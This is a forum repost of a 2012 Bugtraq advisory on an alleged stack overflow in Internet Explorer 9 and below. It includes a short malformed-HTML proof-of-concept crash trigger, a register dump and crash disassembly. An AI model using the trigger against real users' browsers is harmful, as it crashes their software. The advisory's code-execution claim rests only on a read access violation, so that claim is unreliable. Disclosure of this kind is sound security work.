Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Nytro · December 20, 2012

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

From: pereira () secbiz de

Date: Wed, 19 Dec 2012 15:40:46 GMT

-----------------------------------------------------------------------

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

-----------------------------------------------------------------------

Author: Jean Pascal Pereira <pereira () secbiz de>

Vendor: Microsoft Internet Explorer 9.x and below

Description:

The application is prone to a remote stack overflow vulnerability.

Successful exploitation may lead to arbitrary code execution.

----------------------------------------------------------------------

Proof Of Concept:

----------------------------------------------------------------------

<table></for xmlns="1">
<td><datetime><colgroup>
<id><dd><col>
</table><object>
<hr><base>

----------------------------------------------------------------------

Register Dump:

----------------------------------------------------------------------

EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51

----------------------------------------------------------------------

Crash Instruction:

----------------------------------------------------------------------

7629CF36   8B4D E4          MOV ECX,DWORD PTR SS:[EBP-1C]
7629CF39   24 04            AND AL,4
7629CF3B   0FB6C0           MOVZX EAX,AL
7629CF3E   F7D8             NEG EAX
7629CF40   1BC0             SBB EAX,EAX
7629CF42   25 0A010180      AND EAX,8001010A
7629CF47   8901             MOV DWORD PTR DS:[ECX],EAX
7629CF49   8B45 E8          MOV EAX,DWORD PTR SS:[EBP-18]
7629CF4C   50               PUSH EAX
7629CF4D   53               PUSH EBX
7629CF4E   8975 D8          MOV DWORD PTR SS:[EBP-28],ESI
7629CF51   FF70 5C          PUSH DWORD PTR DS:[EAX+5C]

----------------------------------------------------------------------

At 0x7629CF51, a read access violation occurs.

----------------------------------------------------------------------

Jean Pascal Pereira <pereira () secbiz de> || 0xffe4

Copy: #627968 • KDE Pastebin

Sursa: Bugtraq: Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Sign In

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages